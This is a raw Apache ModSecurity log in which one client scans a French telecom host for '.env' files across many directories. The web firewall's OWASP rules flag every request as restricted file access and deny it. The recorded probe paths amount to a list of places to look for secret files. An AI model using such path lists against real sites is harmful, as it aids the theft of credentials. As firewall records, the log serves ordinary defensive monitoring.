[Mon May 11 17:22:58.143514 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/svelte/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNsgAAAAI"]
[Mon May 11 17:22:58.297537 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /vite/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/vite/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNtAAAAAI"]
[Mon May 11 17:22:58.298021 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/vite/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNtAAAAAI"]
[Mon May 11 17:22:58.298268 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/vite/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNtAAAAAI"]
[Mon May 11 17:22:58.453763 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNtQAAAAI"]
[Mon May 11 17:22:58.454271 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNtQAAAAI"]
[Mon May 11 17:22:58.454516 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNtQAAAAI"]
[Mon May 11 17:22:58.610488 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backups/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/backups/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNtgAAAAI"]
[Mon May 11 17:22:58.610964 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/backups/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNtgAAAAI"]
[Mon May 11 17:22:58.611239 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/backups/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNtgAAAAI"]
[Mon May 11 17:22:58.765920 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNtwAAAAI"]
[Mon May 11 17:22:58.766422 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNtwAAAAI"]
[Mon May 11 17:22:58.766668 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNtwAAAAI"]
[Mon May 11 17:22:58.921825 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tmp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/tmp/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNuAAAAAI"]
[Mon May 11 17:22:58.922314 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/tmp/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNuAAAAAI"]
[Mon May 11 17:22:58.922551 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/tmp/.env"] [unique_id "agH0Ug-Qm4vhlWBPlMjNuAAAAAI"]
[Mon May 11 17:22:59.076943 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /temp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/temp/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNuQAAAAI"]
[Mon May 11 17:22:59.077442 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/temp/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNuQAAAAI"]
[Mon May 11 17:22:59.077687 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/temp/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNuQAAAAI"]
[Mon May 11 17:22:59.232846 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/lab/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNuwAAAAI"]
[Mon May 11 17:22:59.233346 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/lab/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNuwAAAAI"]
[Mon May 11 17:22:59.233603 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/lab/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNuwAAAAI"]
[Mon May 11 17:22:59.387717 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/cronlab/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNvAAAAAI"]
[Mon May 11 17:22:59.388123 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/cronlab/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNvAAAAAI"]
[Mon May 11 17:22:59.388362 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/cronlab/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNvAAAAAI"]
[Mon May 11 17:22:59.542728 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNvgAAAAI"]
[Mon May 11 17:22:59.543338 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNvgAAAAI"]
[Mon May 11 17:22:59.543591 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNvgAAAAI"]
[Mon May 11 17:22:59.697370 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/en/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNvwAAAAI"]
[Mon May 11 17:22:59.697787 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/en/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNvwAAAAI"]
[Mon May 11 17:22:59.698019 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/en/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNvwAAAAI"]
[Mon May 11 17:22:59.852409 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNwAAAAAI"]
[Mon May 11 17:22:59.852893 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNwAAAAAI"]
[Mon May 11 17:22:59.853116 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/administrator/.env"] [unique_id "agH0Uw-Qm4vhlWBPlMjNwAAAAAI"]
[Mon May 11 17:23:00.009016 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/psnlink/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNwQAAAAI"]
[Mon May 11 17:23:00.009538 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/psnlink/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNwQAAAAI"]
[Mon May 11 17:23:00.009804 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/psnlink/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNwQAAAAI"]
[Mon May 11 17:23:00.164047 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/exapi/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNwgAAAAI"]
[Mon May 11 17:23:00.164544 2026] [security2:error] [pid 1411099:tid 1411103] [client 54.241.173.61:44720] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/exapi/.env"] [unique_id "agH0VA-Qm4vhlWBPlMjNwgAAAAI"]
